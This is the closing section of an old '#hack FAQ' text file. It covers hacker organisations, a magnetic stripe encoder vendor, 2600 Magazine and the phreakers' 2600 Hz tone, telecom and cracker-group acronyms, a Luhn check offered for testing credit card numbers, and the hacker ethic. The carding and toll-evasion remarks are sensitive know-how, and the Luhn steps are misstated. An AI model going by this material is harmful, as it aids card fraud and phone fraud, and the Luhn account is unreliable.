                                                            #hack FAQ (86/4113)
                 ADDRESS LEAGUE@PREP.AI.MIT.EDU, OR WRITE TO:
                                       
                        LEAGUE FOR PROGRAMMING FREEDOM
                             1 KENDALL SQUARE #143
                                 P.O. BOX 9171
                            CAMBRIDGE, MA 02139 USA
                                       
                                       
                                    SOTMESC
                                    ~~~~~~~
     FOUNDED IN 1989, SOTMESC IS DEDICATED TO PRESERVING THE INTEGRITY AND
     COHESION OF THE COMPUTING SOCIETY.  BY PROMOTING COMPUTER EDUCATION,
      LIBERTIES AND EFFICIENCY, WE BELIEVE WE CAN SECURE FREEDOMS FOR ALL
                    COMPUTER USERS WHILE RETAINING PRIVACY.
                                       
         SOTMESC MAINTAINS THE CSP INTERNET MAILING LIST, THE SOTMESC
                 SCHOLARSHIP FUND, AND THE SOTMESC NEWSLETTER.
                                       
     THE SOTMESC IS FINANCED PARTLY BY MEMBERSHIP FEES, AND DONATIONS, BUT
    MOSTLY BY SELLING HACKING, CRACKING, PHREAKING, ELECTRONICS, INTERNET,
       AND VIRUS INFORMATION AND PROGRAMS ON DISK AND BOUND PAPER MEDIA.
                                       

                                                            #hack FAQ (86/4135)
      SOTMESC MEMBERSHIPS ARE $20 TO STUDENTS AND $40 TO REGULAR MEMBERS.
                                       
                                    SOTMESC
                                 P.O. BOX 573
                             LONG BEACH, MS  39560
                                       
                                       
          12. WHERE CAN I PURCHASE A MAGNETIC STRIPE ENCODER/DECODER?
                                       
                                  CPU ADVANCE
                                  PO BOX 2434
                                HARWOOD STATION
                             LITTLETON, MA  01460
                              (508)624-4819 (FAX)
                                       
                                       
                                       
                                       
                                SECTION D: 2600
                                ~~~~~~~~~~~~~~~
                                       
                             01. WHAT IS ALT.2600?

                                                            #hack FAQ (87/4158)
     ALT.2600 IS A USENET NEWSGROUP FOR DISCUSSION OF MATERIAL RELATING TO
      2600 MAGAZINE, THE HACKER QUARTERLY.   IT IS NOT FOR THE ATARI 2600
          GAME MACHINE.  LEN@NETSYS.COM CREATED THE GROUP ON EMMANUEL
     GOLDSTEIN'S RECOMMENDATION.  EMMANUEL IS THE EDITOR/PUBLISHER OF 2600
    MAGAZINE. FOLLOWING THE BARRAGE OF POSTINGS ABOUT THE ATARI MACHINE TO
      ALT.2600, AN ALT.ATARI.2600 WAS CREATED TO DIVERT ALL OF THE ATARI
     TRAFFIC FROM ALT.2600.  ATARI 2600 PEOPLE ARE ADVISED TO HIE OVER TO
                           REC.GAMES.VIDEO.CLASSIC.
                                       
                                       
                          02. WHAT DOES "2600" MEAN?
                                       
                                       
          2600HZ WAS A TONE THAT WAS USED BY EARLY PHONE PHREAKS (OR
  PHREAKERS) IN THE 80'S, AND SOME CURRENTLY.  IF THE TONE WAS SENT DOWN THE
   LINE AT THE PROPER TIME, ONE COULD GET AWAY WITH ALL SORTS OF FUN STUFF.
                                       
                        A NOTE FROM EMMANUEL GOLDSTEIN:
                                       
                                       
        "THE ATARI 2600 HAS NOTHING TO DO WITH BLUE BOXES OR TELEPHONES
       OR THE 2600 HERTZ TONE.  THE 2600 HERTZ TONE WAS SIMPLY THE FIRST

                                                            #hack FAQ (87/4180)
        STEP TOWARDS EXPLORING THE NETWORK.  IF YOU WERE SUCCESSFUL AT
         GETTING A TOLL CALL TO DROP, THEN BILLING WOULD STOP AT THAT
        POINT BUT THERE WOULD BE BILLING FOR THE NUMBER ALREADY DIALED
         UP UNTIL THE POINT OF SEIZURE.  800 NUMBERS AND LONG DISTANCE
       INFORMATION WERE BOTH FREE IN THE PAST AND RECORDS OF WHO CALLED
         WHAT WERE EITHER NON-EXISTENT OR VERY OBSCURE WITH REGARDS TO
         THESE NUMBERS.  THIS, NATURALLY, MADE THEM MORE POPULAR THAN
           NUMBERS THAT SHOWED UP ON A BILL, EVEN IF IT WAS ONLY FOR
        A MINUTE.  TODAY, MANY 800 NUMBERS GO OVERSEAS, WHICH PROVIDES
           A QUICK AND FREE WAY INTO ANOTHER COUNTRY'S PHONE SYSTEM
                   WHICH MAY BE MORE OPEN FOR EXPLORATION."
                                       
                                       
               03. ARE THERE ON-LINE VERSIONS OF 2600 AVAILABLE?
                                       
                                       
                                      NO.
                                       
                                       
           04. I CAN'T FIND 2600 AT ANY BOOKSTORES.  WHAT CAN I DO?
                                       
      SUBSCRIBE.  OR, LET 2600 KNOW VIA THE SUBSCRIPTION ADDRESS THAT YOU

                                                            #hack FAQ (87/4202)
        THINK 2600 SHOULD BE IN THE BOOKSTORE.  BE SURE TO INCLUDE THE
                         BOOKSTORES NAME AND ADDRESS.
                                       
                                       
    05. WHY DOES 2600 COST MORE TO SUBSCRIBE TO THAN TO BUY AT A NEWSSTAND?
                                       
                        A NOTE FROM EMMANUEL GOLDSTEIN:
                                       
       WE'VE BEEN SELLING 2600 AT THE SAME NEWSSTAND PRICE ($4) SINCE 1988
       AND WE HOPE TO KEEP IT AT THAT PRICE FOR AS LONG AS WE CAN GET AWAY
        WITH IT. AT THE SAME TIME, $21 IS ABOUT THE RIGHT PRICE TO COVER
       SUBSCRIBER COSTS, INCLUDING POSTAGE AND RECORD KEEPING, ETC. PEOPLE
       WHO SUBSCRIBE DON'T HAVE TO WORRY ABOUT FINDING AN ISSUE SOMEPLACE,
         THEY TEND TO GET ISSUES SEVERAL WEEKS BEFORE THE NEWSSTANDS GET
          THEM, AND THEY CAN TAKE OUT FREE ADS IN THE 2600 MARKETPLACE.
                                       
       THIS IS NOT UNCOMMON IN THE PUBLISHING INDUSTRY.  THE NY TIMES, FOR
     EXAMPLE, COSTS $156.50 AT THE NEWSSTANDS, AND $234.75 DELIVERED TO YOUR
                                      DOOR.
                                       
                                       
                                       

                                                            #hack FAQ (88/4225)
                           SECTION E: MISCELLANEOUS
                           ~~~~~~~~~~~~~~~~~~~~~~~~
                                       
                         01. WHAT DOES XXX STAND FOR?
                                       
                         TLA     THREE LETTER ACRONYM
                                       
                          ACL     ACCESS CONTROL LIST
                    PIN     PERSONAL IDENTIFICATION NUMBER
                        TCB     TRUSTED COMPUTING BASE
                                       
                     ALRU    AUTOMATIC LINE RECORD UPDATE
                           AN      ASSOCIATED NUMBER
                    ARSB    AUTOMATED REPAIR SERVICE BUREAU
                      ATH     ABBREVIATED TROUBLE HISTORY
                        BOC     BELL OPERATING COMPANY
                          BOR     BASIC OUTPUT REPORT
                                 CA      CABLE
                       COE     CENTRAL OFFICE EQUIPMENT
                    CMC     CONSTRUCTION MAINTENANCE CENTER
                     CNID    CALLING NUMBER IDENTIFICATION
                            CO      CENTRAL OFFICE

                                                            #hack FAQ (88/4247)
                COCOT   CUSTOMER OWNED COIN OPERATED TELEPHONE
              CRSAB   CENTRALIZED REPAIR SERVICE ANSWERING BUREAU
                        DDD     DIRECT DISTANCE DIALING
                          ECC     ENTER CABLE CHANGE
                             LD      LONG DISTANCE
                  LMOS    LOOP MAINTENANCE OPERATIONS SYSTEM
                        MLT     MECHANIZED LOOP TESTING
                          NPA     NUMBERING PLAN AREA
                      POTS    PLAIN OLD TELEPHONE SERVICE
                    RBOC    REGIONAL BELL OPERATING COMPANY
                         RSB     REPAIR SERVICE BUREAU
                            SS      SPECIAL SERVICE
                      TAS     TELEPHONE ANSWERING SERVICE
                            TH      TROUBLE HISTORY
              TREAT   TROUBLE REPORT EVALUATION AND ANALYSIS TOOL
                                       
                            LOD     LEGION OF DOOM
                            HFC     HELL FIRE CLUB
                             TNO     THE NEW ORDER
                                       
                        ACID    ANSI CREATORS IN DEMAND
                       CCI     CYBERCRIME INTERNATIONAL

                                                            #hack FAQ (88/4269)
                               FLT     FAIRLIGHT
                      ICE     INSANE CREATORS ENTERPRISE
                   INC     INTERNATIONAL NETWORK OF CRACKERS
                    NTA     THE NOCTURNAL TRADING ALLIANCE
                                PDX     PARADOX
                             PE      PUBLIC ENEMY
                               PSY     PSYCHOSE
                                QTX     QUARTEX
                             RZR     RAZOR (1911)
                          S!P     SUPR!SE PRODUCTIONS
                            TDT     THE DREAM TEAM
                            THG     THE HUMBLE GUYS
                            THP     THE HILL PEOPLE
                        TRSI    TRISTAR RED SECTOR INC.
                                       
                                       
         02. HOW DO I DETERMINE IF I HAVE A VALID CREDIT CARD NUMBER?
                                       
     CREDIT CARDS US THE LUHN CHECK DIGIT ALGORITHM.  THE MAIN PURPOSE OF
     THIS ALGORITHM IS TO CATCH DATA ENTRY ERRORS, BUT IT DOES DOUBLE DUTY
                         HERE AS A WEAK SECURITY TOOL.
                                       

                                                            #hack FAQ (88/4291)
     FOR A CARD WITH AN EVEN NUMBER OF DIGITS, DOUBLE EVERY ODD DIGIT AND
      SUBTRACT 9 IF THE PRODUCT IS GREATER THAN 10.  ADD UP ALL THE EVEN
      DIGITS AS WELL AS THE DOUBLED-ODD DIGITS, AND THE RESULT MUST BE A
       MULTIPLE OF 10 OR IT'S NOT A VALID CARD.  IF THE CARD HAS AN ODD
     NUMBER OF DIGITS, PERFORM THE SAME ADDITION DOUBLING THE EVEN DIGITS
                                   INSTEAD.
                                       
                                       
                 03. WHERE CAN I GET A COPY OF THE #HACK FAQ?
                                       
                              FIND IT ON FTP AT:
                              RAHUL.NET /PUB/LPS
                                       
                         FIND IT ON WORLD WIDE WEB AT:
                            HTTP://DFW.NET/~ALEPH1
              HTTP://WWW.ENGIN.UMICH.EDU/~JGOTTS/UNDERGROUND.HTML
                         HTTP://WWW.PHANTOM.COM/~KING
                                       
                            FIND IT WITH FINGER AT:
                              WILL@GNU.AI.MIT.EDU
                                       
                                       

                                                            #hack FAQ (88/4313)
                      04. WHAT ARE THE ETHICS OF HACKING?
                                       
 THE FAQ ANSWER IS EXCERPTED FROM: HACKERS: HEROES OF THE COMPUTER REVOLUTION
                                                 BY STEVEN LEVY
                                       
      ACCESS TO COMPUTERS -- AND ANYTHING WHICH MIGHT TEACH YOU SOMETHING
        ABOUT THE WAY THE WORLD WORKS -- SHOULD BE UNLIMITED AND TOTAL.
                   ALWAYS YIELD TO THE HANDS-ON IMPERATIVE.
                                       
                        ALL INFORMATION SHOULD BE FREE.
                                       
                MISTRUST AUTHORITY.  PROMOTE DECENTRALIZATION.
                                       
     HACKERS SHOULD BE JUDGED BY THEIR HACKING, NOT BOGUS CRITERIA SUCH AS
                       DEGREES, AGE, RACE, OR POSITION.
                                       
                 YOU CAN CREATE ART AND BEAUTY ON A COMPUTER.
                                       
                COMPUTERS CAN CHANGE YOUR LIFE FOR THE BETTER.
                                       
                                       
                                       

                                                            #hack FAQ (89/4336)
                                      EOT
                                       
   
   ___________________________________
   [Home[1]] [Main[2]] [Prev[3]] [Next[4]]